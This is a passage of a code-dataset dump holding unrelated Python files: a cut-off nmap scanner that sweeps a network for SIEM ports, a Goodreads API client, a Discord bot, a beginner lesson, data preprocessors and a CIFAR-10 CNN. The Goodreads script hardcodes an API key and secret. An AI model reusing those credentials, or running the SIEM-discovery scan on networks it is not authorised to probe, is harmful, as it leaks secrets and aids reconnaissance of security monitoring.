The SIEM detected is: \" + Fore.RED + Style.BRIGHT + siemdetected)\n\t\tprint(SEPARATOR)\n\n\treturn siemdetected\n\ndef scan_network():\n\n\tprint(SEPARATOR)\n\tsiemnet = input(\n\t\t\"[!] Enter network to scan for SIEMs in CIDR notation, for example: 192.168.1.0/24: \")\n\n\ttry:\n\t\tnm = nmap.PortScanner()\n\t\tnm.scan(hosts = siemnet, arguments = '-sP -PS8089,443,9000')\n\t\treturn nm.all_hosts()\n\n\texcept Exception as e:\n\t\tlogging.error(e, exc_info = True)\n\n# %%%%%%%%%% The End %%%%%%%%%%#\n","sub_path":"poc/scanning.py","file_name":"scanning.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"212887676","text":"\"\"\"A simple command line application that consumes a Public API using a HTTP client library.\nMy test uses GoodReads API\n#api_key = \"UiFicY0HAqcAVaiWUmoVw\"\nSome of output from the below program:\n\n3.50\n 2\n \n\n\n18541\nTim O'Reilly\n\n\n\n\n\n\n\n\n3.83\n1561\n128\n\n\n 2015\n\n\"\"\"\n\nimport requests\n\nprint(\"Search for Book Authors with this app\")\n\nauthor_id = input ( \"Enter Goodreads User: \" )\n\napi_secret = \"JCZKvzXggksmdaXMrWKuS4P2w48HseiYSVNEOBvnLs\"\nresponse = requests.get ( \"https://www.goodreads.com/author/show.xml\" , params={#decode json from the response\n 'id': '18541' ,#AuthorID\n 'key': 'UiFicY0HAqcAVaiWUmoVw' ,\n 'secret': 'JCZKvzXggksmdaXMrWKuS4P2w48HseiYSVNEOBvnL'\n} )\nprint(response.text)\n","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"567754133","text":"import discord\r\nimport discord.ext.commands as commands\r\nfrom datetime import datetime\r\n\r\n\r\nclass ggpog(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n\r\n @commands.Cog.listener()\r\n async def on_member_remove(self, member):\r\n try :\r\n guild = self.bot.get_guild(477929808022601739)\r\n pog_champ = guild.get_role(786300688866082886)\r\n\r\n mod_chat = guild.get_channel(746335357079126046)\r\n\r\n embed = discord.Embed(title = \"Pog Champ has left the server!\")\r\n embed.description = f\"{member.mention} {member} has left the server.\"\r\n embed.timestamp = datetime.utcnow()\r\n\r\n if pog_champ in member.roles :\r\n await mod_chat.send(embed = embed)\r\n\r\n else :\r\n pass\r\n\r\n\r\n except Exception as error :\r\n raise error\r\n \r\n \r\n\r\ndef setup(bot):\r\n bot.add_cog(ggpog(bot))\r\n","sub_path":"ggpog/ggpog.py","file_name":"ggpog.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"207739684","text":"# 03_Conditions.py\n# \n# You remember how we used TRUE and FALSE? These are just TWO types of \n# MANY conditions we can use. \n#\n# With an IF statement condition, as long as the condition you have provided\n# is TRUE, then the code in the IF statement will run. Then we can \n# use the ELSE for anything else.\n#\n# This technique is used for:\n# - Checking passwords are correct\n# - Checking if your character has hit the ground in a game.\n# - Use in your controllers for Minecraft to see if you are walking forward\n# , backward, left, right or anything else. 
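A tiny preview of the kind of\n# check we will build below (just a sketch): if health <= 0: print("Game over")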
\n# \n\n\ndef main():\n\t\n\t# To make the statement, we will need these comparison operators:\n\t# == : Equals\n\t# != : Not Equals\n\t# > : Greater than\n\t# < : Less Than\n\t# >= : Greater than or equal to.\n\t# <= : Less than or equal to \n\t# \n\t# Let's try the equals one with something we know is true.\n\t\n\tif 1==1: \n\t\tprint(\"This is true\")\n\telse:\n\t\tprint(\"This is false\")\n\t\t\n\t# Let's try something that we know is false. \n\t\n\tif 1 == 2:\n\t\tprint(\"This is true\")\n\telse:\n\t\tprint(\"This is false\")\n\t\t\n\t# What is going to print?\n\t\n\t# Let's try a greater than one.\n\t\n\tif 2 > 1:\n\t\tprint(\"This is true\")\n\telse:\n\t\tprint(\"This is false\")\n\t\n\t# Try your own below. \n\tif 5 == 7:\n\t\tprint(\"This is true!\")\n\telse:\n\t\tprint(\"This is false...\")\n\t# Try writing a function that simplifies the above stuff...\n\t# Call the function \"TrueOrFalse()\" where the argument is the \n\t# Condition...\n\tTrueOrFalse(1==1)\n\tTrueOrFalse(2==3)\n\tTrueOrFalse(5<8)\n\n\t\n\t\t\ndef TrueOrFalse(Condition):\n\tif(Condition):\n\t\tprint(\"That is correct!\")\n\telse:\n\t\tprint(\"That is incorrect!\")\n\t\nif __name__ == \"__main__\":\n\timport sys\n\tmain()\n\t\n\tsys.exit()\n","sub_path":"Lesson_04 Controls/03_Conditions.py","file_name":"03_Conditions.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"84855915","text":"# -*- coding: utf-8 -*-\nimport re\nimport numpy as np \nfrom math import inf\n\nfrom Param import Param\n\nclass ParamRobot(Param):\n    '''\n    Class for reading from and writing to a robot parameter file.\n    '''\n    def __init__(self):\n        self.param = {}\n        self.fileName = \"robot_param\"\n        \n        self.load()\n\n    \n    def load(self):\n        lines = []\n        with open(self.fileName, \"r\") as param_file:\n            for line in param_file:\n                lines.append(line)\n        \n        self.param = {}\n        path = []\n        for line in lines:\n            line = re.sub('[\\n]', \"\", line)\n            p = re.split(\"[: ]\", line)\n            \n            thisPath = []\n            \n            for i,value in enumerate(p.copy()):\n                if value != \"\":\n                    thisPath = path[:i]\n                    p = p[i:]\n                    break\n            \n            if len(p) < 2:\n                continue\n            \n            path = thisPath\n            \n            if p[1] == \"\":\n                path.append(p[0])\n                continue\n            else :\n                thisPath.append(p[0])\n                thisPath = \":\".join(thisPath)\n                self.set_param(thisPath, p[1])\n\n        self.param['t34'] = self.load_t34()\n    \n    def load_t34(self):\n        try:\n            return np.genfromtxt('t34',delimiter=' ',encoding=\"utf8\")\n        except :\n            return np.eye(4)\n\n    def save(self):\n        save = self.dictToSerial(self.param, 0)\n        print(save)\n        with open(self.fileName, \"w\") as param_file:\n            param_file.write(save)\n        \n        t34 = self.get_param(\"t34\")\n        with open(\"t34\", \"w\") as t34_file:\n            np.savetxt(t34_file, t34)\n    \n    def get_posmax(self, *index):\n        vmax = []\n        for i in index:\n            path = \"q\" + str(i) + \":pos:max\"\n            vmax.append(self.get_param(path, val_def=inf, type_var=float))\n        return vmax\n    \n    def get_vmax(self, *index):\n        vmax = []\n        for i in index:\n            path = \"q\" + str(i) + \":vmax\"\n            vmax.append(self.get_param(path, val_def=inf, type_var=float))\n        return vmax\n    \n    def get_amax(self, *index):\n        vmax = []\n        for i in index:\n            path = \"q\" + str(i) + \":amax\"\n            vmax.append(self.get_param(path, val_def=inf, type_var=float))\n        return vmax\n    \n    def get_posmin(self, *index):\n        vmax = []\n        for i in index:\n            path = \"q\" + str(i) + \":pos:min\"\n            vmax.append(self.get_param(path, val_def=-inf, type_var=float))\n        return vmax","sub_path":"ParamRobot.py","file_name":"ParamRobot.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"474913779","text":"import os\nimport re\nimport jieba\nimport config.get_config as _config\nfrom zhon.hanzi import punctuation\n\n'''\nDialogue dataset preprocessing module.\nraw_data holds the path of the original dataset.\ntokenized_data holds the path of the tokenized dataset.\n'''\n\n\ndef preprocess_raw_data():\n    \"\"\"\n    Preprocesses the raw text: the raw dialogues are tokenized and then\n    saved to a new file for later use.\n    :return:\n    \"\"\"\n    raw_data = _config.resource_data\n    tokenized_data = _config.tokenized_data\n\n    # First make sure the raw dataset exists; exit if it does not\n    if not os.path.exists(raw_data):\n        print('Dataset not found, please add a dataset!')\n        exit()\n\n    pairs = []\n\n    # Pair up each dialogue round's context into a question part and an answer\n    # part; when the next round starts, skip straight ahead\n    with open(raw_data, encoding='utf-8') as raw_file:\n        one_pair = []\n        pair_count = 0\n        for line in raw_file:\n            line = line.strip('\\n').replace('/', '')\n            # line = re.sub(r\"[%s]+\" % punctuation, \"\", line)\n            # The raw dataset is laid out round by round, so note that after a\n            # round ends its last sentence must not serve as a question; we\n            # jump on to the next round instead\n            if line == '':\n                one_pair = []\n                continue\n            elif len(one_pair) == 1:\n                one_pair.append(line)\n                pairs.append(one_pair)\n                one_pair = [line]\n                pair_count += 1\n                if pair_count % 10000 == 0:\n                    print('Processed:', pair_count, 'question-answer pairs')\n            else:\n                one_pair.append(line)\n\n    print('Reading finished, processing...')\n    results = []\n    # Next, tokenize the dialogue content above and store it in the\n    # train_tokenized file\n    for pair in pairs:\n        if len(pair) != 2:\n            continue\n\n        # Tokenize with the jieba tokenizer\n        pair[0] = \" \".join(jieba.cut(pair[0]))\n        pair[1] = \" \".join(jieba.cut(pair[1]))\n        results.append(pair[0] + '\\t' + pair[1])\n\n    # Write the processed data held in memory out to the new file\n    train_tokenized = open(tokenized_data, 'w', encoding='utf-8')\n    for i in range(len(results)):\n        train_tokenized.write(results[i] + '\\n')\n        if i % 10000 == 0:\n            print(len(range(len(results))), 'progress:', i)\n\n    train_tokenized.close()\n","sub_path":"hlp/chat/common/pre_treat.py","file_name":"pre_treat.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"467837194","text":"import pandas as pd\nimport numpy as np\nimport s3fs\n\n\ndef preprocess(s3_in_url,\n               s3_out_bucket,\n               s3_out_prefix,\n               delimiter=\",\"):\n    \"\"\"Preprocesses data based on business logic\n\n    - Reads delimited file passed as s3_url and preprocess data by filtering\n    long tail in the customer ratings data i.e. keep customers who have rated 5\n    or more videos, and videos that have been rated by 9+ customers\n    - Preprocessed data is then written to output\n\n    Args:\n        s3_in_url:\n            s3 url to the delimited file to be processed\n            e.g. s3://amazon-reviews-pds/tsv/reviews.tsv.gz\n        s3_out_bucket:\n            s3 bucket where preprocessed data will be staged\n            e.g. mybucket\n        s3_out_prefix:\n            s3 url prefix to stage preprocessed data to use later in the pipeline\n            e.g. amazon-reviews-pds/preprocess/\n        delimiter:\n            delimiter to be used for parsing the file. 
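For the gzipped TSV example above this would be \"\\t\". 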
Defaults to \",\" if none\n provided\n\n Returns:\n status of preprocessed data\n\n Raises:\n IOError: An error occurred accessing the s3 file\n \"\"\"\n try:\n print(\"preprocessing data from {}\".format(s3_in_url))\n # read s3 url into pandas dataframe\n # pandas internally uses s3fs to read s3 file directory\n df = pd.read_csv(s3_in_url, delimiter, error_bad_lines=False)\n\n # limit dataframe to customer_id, product_id, and star_rating\n # `product_title` will be useful validating recommendations\n df = df[['customer_id', 'product_id', 'star_rating', 'product_title']]\n\n # clean out the long tail because most people haven't seen most videos,\n # and people rate fewer videos than they actually watch\n customers = df['customer_id'].value_counts()\n products = df['product_id'].value_counts()\n\n # based on data exploration only about 5% of customers have rated 5 or\n # more videos, and only 25% of videos have been rated by 9+ customers\n customers = customers[customers >= 5]\n products = products[products >= 10]\n print(\"# of rows before the long tail = {:10d}\".format(df.shape[0]))\n reduced_df = df \\\n .merge(pd.DataFrame({'customer_id': customers.index})) \\\n .merge(pd.DataFrame({'product_id': products.index}))\n print(\"# of rows after the long tail = {:10d}\".format(\n reduced_df.shape[0]))\n reduced_df = reduced_df.drop_duplicates(['customer_id', 'product_id'])\n print(\"# of rows after removing duplicates = {:10d}\".format(\n reduced_df.shape[0]))\n\n # recreate customer and product lists since there are customers with\n # more than 5 reviews, but all of their reviews are on products with\n # less than 5 reviews (and vice versa)\n customers = reduced_df['customer_id'].value_counts()\n products = reduced_df['product_id'].value_counts()\n\n # sequentially index each user and item to hold the sparse format where\n # the indices indicate the row and column in our ratings matrix\n customer_index = pd.DataFrame({\n 'customer_id': customers.index,\n 'customer': np.arange(customers.shape[0])})\n product_index = pd.DataFrame({\n 'product_id': products.index,\n 'product': np.arange(products.shape[0])})\n reduced_df = reduced_df \\\n .merge(customer_index) \\\n .merge(product_index)\n\n nb_customer = reduced_df['customer'].max() + 1\n nb_products = reduced_df['product'].max() + 1\n feature_dim = nb_customer + nb_products\n print(nb_customer, nb_products, feature_dim)\n\n product_df = reduced_df[['customer', 'product', 'star_rating']]\n\n # split into train, validation and test data sets\n train_df, validate_df, test_df = np.split(\n product_df.sample(frac=1),\n [int(.6*len(product_df)), int(.8*len(product_df))]\n )\n\n print(\"# of rows train data set = {:10d}\".format(\n train_df.shape[0]))\n print(\"# of rows validation data set = {:10d}\".format(\n validate_df.shape[0]))\n print(\"# of rows test data set = {:10d}\".format(\n test_df.shape[0]))\n\n # select columns required for training the model\n # excluding columns \"customer_id\", \"product_id\", \"product_title\" to\n # keep files small\n cols = [\"customer\", \"product\", \"star_rating\"]\n train_df = train_df[cols]\n validate_df = validate_df[cols]\n test_df = test_df[cols]\n\n # write output to s3 as delimited file\n fs = s3fs.S3FileSystem(anon=False)\n if s3_out_prefix[-1] == \"/\":\n s3_out_prefix = s3_out_prefix[:-1]\n else:\n s3_out_prefix = s3_out_prefix\n s3_out_train = \"s3://{}/{}/{}\".format(\n s3_out_bucket, s3_out_prefix, \"train/train.csv\")\n print(\"writing training data to {}\".format(s3_out_train))\n with 
fs.open(s3_out_train, \"wb\") as f:\n            train_df.to_csv(f, sep=str(','), index=False)\n\n        s3_out_validate = \"s3://{}/{}/{}\".format(\n            s3_out_bucket, s3_out_prefix, \"validate/validate.csv\")\n        print(\"writing validation data to {}\".format(s3_out_validate))\n        with fs.open(s3_out_validate, \"wb\") as f:\n            validate_df.to_csv(f, sep=str(','), index=False)\n\n        s3_out_test = \"s3://{}/{}/{}\".format(\n            s3_out_bucket, s3_out_prefix, \"test/test.csv\")\n        print(\"writing test data to {}\".format(s3_out_test))\n        with fs.open(s3_out_test, \"wb\") as f:\n            test_df.to_csv(f, sep=str(','), index=False)\n\n        print(\"preprocessing completed\")\n        return \"SUCCESS\"\n    except Exception as e:\n        raise e\n","sub_path":"ejcorp_assignment_2/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
+{"seq_id":"581019841","text":"from __future__ import print_function\n\nimport tensorflow as tf\nimport re\nimport numpy as np\nimport cPickle\nimport random\nimport os\nimport shutil\nimport matplotlib.pyplot as plt\nimport threading\n\nfrom scipy import ndimage\nFLAGS = tf.app.flags.FLAGS\n\n###################################\n# Basic model parameters.\ntf.app.flags.DEFINE_integer('batch_size', 128,\n                            \"\"\"Number of images to process in a batch.\"\"\")\ntf.app.flags.DEFINE_string('data_dir', '/tmp/cifar10_data',\n                           \"\"\"Path to the CIFAR-10 data directory.\"\"\")\ntf.app.flags.DEFINE_boolean('use_fp16', False,\n                            \"\"\"Train the model using fp16.\"\"\")\ntf.app.flags.DEFINE_boolean('summary', False,\n                            \"\"\"Write TensorBoard summaries.\"\"\")\n\n\nTOWER_NAME = 'tower'\n###################################\n### import all the Cifar10 Data ###\n## Read Pickle\ntrain_data = cPickle.load( open( \"cifar10_train.p\", \"rb\" ) )\n#cur_batch = cPickle.load(open (\"cifar10_train_data_batch_1.p\",\"rb\"))\n#next_batch = cPickle.load(open (\"cifar10_train_data_batch_2.p\",\"rb\"))\n#batch_index = 3\ntest_data = cPickle.load( open( \"cifar10_test.p\", \"rb\" ) )\n## Parse to dictionary\ncur_train_images = np.array(train_data['images'])\ncur_train_labels = np.array(train_data['labels'])\n#next_train_images = np.array(next_batch['images'])\n#next_train_labels = np.array(next_batch['labels'])\n\ntest_images = np.array(test_data['images'])\ntest_labels = np.array(test_data['labels'])\ntest_labels2 = np.array(test_data['test_labels'])\n####################################\nlearning_rate = 0.001\ntraining_iters = 8000000\nbatch_size = 128\nbatch_num = 0\nnum_of_epochs = 0\ndropout = 0.89 # Less dropout on input, probability to keep units (after dimension reduction)\ndropout2 = 0.7 # Adding dropout with BN\ndisplay_step = 15\n\n# Small epsilon value for the BN transform\nepsilon = 1e-4\n\nsave_dir = 'checkpoints/'\nsummary_dir = 'summary/'\n\nif not os.path.exists(save_dir):\n    os.makedirs(save_dir)\n\nif os.path.exists(summary_dir):\n    shutil.rmtree(summary_dir, ignore_errors=False, onerror=None)\n\nsave_path = os.path.join(save_dir, 'cifar10_cnn')\n\n\n#########################\n#### prepare batch data\n#########################\nshuffle_array = np.random.permutation(50000)\n\nnew_t_labels = []\nnew_t_images = []\nfor i in range (0,50000):\n    new_t_images.append(cur_train_images[shuffle_array[i]])\n    new_t_labels.append(cur_train_labels[shuffle_array[i]])\n\ncur_train_images = new_t_images\ncur_train_labels = new_t_labels\n\nshuffle_array = np.random.permutation(50000)\n\n# Use fresh lists for the second shuffle; cur_train_* now points at the lists\n# above, so appending to them again would grow the current epoch's data.\nnew_t_labels = []\nnew_t_images = []\n\nfor i in range (0,50000):\n    new_t_images.append(cur_train_images[shuffle_array[i]])\n    new_t_labels.append(cur_train_labels[shuffle_array[i]])\n\nnext_train_images = new_t_images\nnext_train_labels = new_t_labels\n\n############################\n#### Helper Functions\n############################\ndef load_batch():\n    # Rebinds the module-level next_train_* lists, so declare them global;\n    # fresh local lists keep each epoch's shuffle independent.\n    global next_train_images, next_train_labels\n    print (\"Shuffle new batch, epoch = \",num_of_epochs)\n    shuffle_array = np.random.permutation(50000)\n    shuffled_images = []\n    shuffled_labels = []\n    for i in range (0,50000):\n        shuffled_images.append(cur_train_images[shuffle_array[i]])\n        shuffled_labels.append(cur_train_labels[shuffle_array[i]])\n\n    next_train_images = shuffled_images\n    next_train_labels = shuffled_labels\n\n\ndef variable_summaries(var):\n    \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n    with tf.name_scope('summaries'):\n        mean = tf.reduce_mean(var)\n\n        tf.summary.scalar('mean', mean)\n        with tf.name_scope('stddev'):\n            stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n        tf.summary.scalar('stddev', stddev)\n        tf.summary.scalar('max', tf.reduce_max(var))\n        tf.summary.scalar('min', tf.reduce_min(var))\n        tf.summary.histogram('histogram', var)\n\n\ndef get_next_cifar_batch():\n#    shuffle_array = np.random.permutation(250000)\n    new_t_images = []\n    new_t_labels = []\n\n## Data Augmentation\n\n    do_translate = random.random()\n    do_rotate = random.random()\n    do_image_flip = random.random()\n\n    rotate_alpha = random.randint(0,1)\n    translateX = random.randint(0,4)\n    translateY = random.randint(0,4)\n    translateZ = 0\n    \n\n    for i in range (0,128):\n        img = cur_train_images[batch_num*128+i]\n        label = cur_train_labels[batch_num*128+i]\n\n        if do_translate > 0.5:\n            img = ndimage.interpolation.shift(img,(translateX,translateY,translateZ))\n        elif do_rotate > 0.5:\n            img = ndimage.rotate(img,rotate_alpha) [0:32,0:32]\n        elif do_image_flip > 0.8:\n            img = np.fliplr(img)\n\n        new_t_images.append(img)\n        new_t_labels.append(label)\n    \n    #######################\n    # images, labels = cur_train_images[batch_num*128:(batch_num+1)*128], cur_train_labels[batch_num*128:(batch_num+1)*128]\n    images, labels = new_t_images, new_t_labels\n    return images, labels\n\ndef _activation_summary(x):\n\n    tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)\n    tf.contrib.deprecated.histogram_summary(tensor_name + '/activations', x)\n    tf.contrib.deprecated.scalar_summary(tensor_name + '/sparsity',\n                                         tf.nn.zero_fraction(x))\n\ndef _variable_on_cpu(name, shape, initializer):\n\n    with tf.device('/cpu:0'):\n        dtype = tf.float16 if FLAGS.use_fp16 else tf.float32\n        var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)\n    return var\n\ndef _variable_with_weight_decay(name, shape, stddev, wd):\n\n    dtype = tf.float16 if FLAGS.use_fp16 else tf.float32\n    var = _variable_on_cpu(\n        name,\n        shape,\n        tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))\n    if wd is not None:\n        weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')\n        tf.add_to_collection('losses', weight_decay)\n    return var\n\n\n\n\n#############################################################\n############# Implement model\n#############################################################\n\n\ndef conv_net(x, weights1, biases1, keep_prob, keep_prob2):\n### Adding some more tensorflow style image augmentation\n    x = tf.image.random_brightness(x, max_delta=63)\n    x = tf.image.random_contrast(x, lower=0.2, upper=1.8)\n\n    # Subtract off the mean and divide by the variance of the pixels.\n    #x = tf.image.per_image_standardization(x)\n    \n\n    h_drop0 = tf.nn.dropout(x, keep_prob)\n    \n    with 
tf.variable_scope('conv1_new') as scope:\n kernel = _variable_with_weight_decay('weights1',\n shape=[3, 3, 3, 96],\n stddev=0.01,\n wd=0.0)\n conv = tf.nn.conv2d(h_drop0, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv1)\n\n # conv2\n with tf.variable_scope('conv2') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 96, 96],\n stddev=0.01,\n wd=0.00)\n conv = tf.nn.conv2d(conv1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv2)\n\n with tf.variable_scope('conv2_2') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 96, 96],\n stddev=0.05,\n wd=0.00)\n conv = tf.nn.conv2d(conv2, kernel, [1, 2, 2, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n\n \n batch_mean1, batch_var1 = tf.nn.moments(pre_activation,[0])\n z1_hat = (pre_activation - batch_mean1) / tf.sqrt(batch_var1 + epsilon)\n\n scale1 = tf.Variable(tf.ones([96]))\n beta1 = tf.Variable(tf.zeros([96]))\n BN1 = scale1 * z1_hat + beta1\n\n conv2_2 = tf.nn.relu(BN1, name=scope.name)\n # conv2_2 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv2_2)\n\n \n # norm1\n norm1 = tf.nn.lrn(conv2_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,\n name='norm1')\n\n\n\n h_drop1 = tf.nn.dropout(norm1, keep_prob2)\n\n with tf.variable_scope('conv3') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 96, 192],\n stddev=0.05,\n wd=0.0)\n conv = tf.nn.conv2d(h_drop1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv3 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv3)\n\n\n with tf.variable_scope('conv4') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 192, 192],\n stddev=0.025,\n wd=0.0)\n conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv4 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv4)\n\n with tf.variable_scope('conv4_2') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 192, 192],\n stddev=0.0125,\n wd=0.0)\n conv = tf.nn.conv2d(conv4, kernel, [1, 2, 2, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n\n batch_mean2, batch_var2 = tf.nn.moments(pre_activation,[0])\n z2_hat = (pre_activation - batch_mean2) / tf.sqrt(batch_var2 + epsilon)\n\n scale1 = tf.Variable(tf.ones([192]))\n beta1 = tf.Variable(tf.zeros([192]))\n BN2 = scale1 * z2_hat + beta1\n\n conv4_2 = tf.nn.relu(BN2, name=scope.name)\n # conv4_2 = 
tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv4_2)\n\n # norm1\n norm2 = tf.nn.lrn(conv4_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,\n name='norm1')\n\n\n h_drop2 = tf.nn.dropout(norm2, keep_prob2)\n\n with tf.variable_scope('conv5') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 192, 192],\n stddev=0.05,\n wd=0.0)\n conv = tf.nn.conv2d(h_drop2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv5 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv5)\n\n with tf.variable_scope('conv6') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[1, 1, 192, 192],\n stddev=0.025,\n wd=0.0)\n conv = tf.nn.conv2d(conv5, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv6 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv6)\n\n\n with tf.variable_scope('conv7') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[1, 1, 192, 10],\n stddev=0.0125,\n wd=0.0)\n conv = tf.nn.conv2d(conv6, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[10], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv7 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv7)\n\n avg1 = tf.nn.avg_pool(conv7, ksize=[1, 6, 6, 1],\n strides=[1, 1, 1, 1], padding='SAME', name='avg1')\n\n\n with tf.variable_scope('softmax_linear') as scope:\n reshape = tf.reshape(avg1, [FLAGS.batch_size, -1])\n dim = reshape.get_shape()[1].value\n weights = _variable_with_weight_decay('weights', shape=[dim, 10],\n stddev=0.05, wd=0.0)\n biases = tf.Variable(tf.constant(0.0, shape=[10], dtype=tf.float32),\n trainable=True, name='biases')\n softmax_linear = tf.add(tf.matmul(reshape, weights), biases, name=scope.name)\n variable_summaries(weights)\n _activation_summary(softmax_linear)\n\n return softmax_linear\n\n\n#####################################\n### tf Graph input (Place holders)\n#####################################\nx = tf.placeholder(tf.float32, shape = (128,32,32,3) )\ny = tf.placeholder(tf.float32, [None, 10])\nkeep_prob = tf.placeholder(tf.float32) #dropout (keep probability)\nkeep_prob2 = tf.placeholder(tf.float32) #dropout (keep probability)\nglobal_step = tf.Variable(initial_value=0,name='global_step', trainable=False)\n\n# Construct model\npred = conv_net(x, 1, 1, keep_prob, keep_prob2)\n\n\n\n# Define loss and optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost,global_step=global_step)\n#optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,momentum=0.9).minimize(cost,global_step=global_step)\n\n# Evaluate model\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initializing the variables\n\n# Create a session\nsession = tf.Session()\n\n# Create a Saver\nsaver = tf.train.Saver()\n\n# Write for tensorboard\nwith tf.name_scope('cross_entropy'):\n with tf.name_scope('total'):\n cross_entropy = 
tf.reduce_mean(cost)\n\n\ntf.summary.scalar('cross_entropy', cross_entropy)\ntf.summary.scalar('learning_rate', learning_rate)\nmerged = tf.summary.merge_all() \ntrain_writer = tf.summary.FileWriter('summary/train',\n session.graph)\n\n# Embedding\n#embedding_var = tf.Variable(tf.float32, shape = (32,32))\n\ntry:\n print(\"Trying to restore last checkpoint ...\")\n\n # Use TensorFlow to find the latest checkpoint - if any.\n last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=save_dir)\n\n # Try and load the data in the checkpoint.\n saver.restore(session, save_path=last_chk_path)\n\n # If we get to this point, the checkpoint was successfully loaded.\n print(\"Restored checkpoint from:\", last_chk_path)\nexcept:\n # If the above failed for some reason, simply\n # initialize all the variables for the TensorFlow graph.\n print(\"Failed to restore checkpoint. Initializing variables instead.\")\n session.run(tf.global_variables_initializer())\n\n\n\n######################################\n#### Launch the graph\n######################################\n#with tf.Session() as sess:\n#sess.run(init)\nstep = 1\n\n# Keep training until reach max iterations\nwhile step * batch_size < training_iters:\n batch_x, batch_y = get_next_cifar_batch()\n\n # Run optimization op (backprop)\n i_global, _ = session.run([global_step, optimizer], feed_dict={x: batch_x, y: batch_y,\n keep_prob: dropout,\n keep_prob2: dropout2})\n\n if step % 370 == 0:\n sum = 0\n for num in range(0, 70):\n # print(num)\n test = session.run(accuracy, feed_dict={x: test_images[num * 128:128 + num * 128],\n y: test_labels[num * 128:128 + num * 128],\n keep_prob: 1.,\n keep_prob2: 1.})\n\n\n sum += test\n \n print (\"Test accuracy = \", sum/70)\n print (\"Ran number of epochs\",num_of_epochs)\n \n batch_num = 0\n 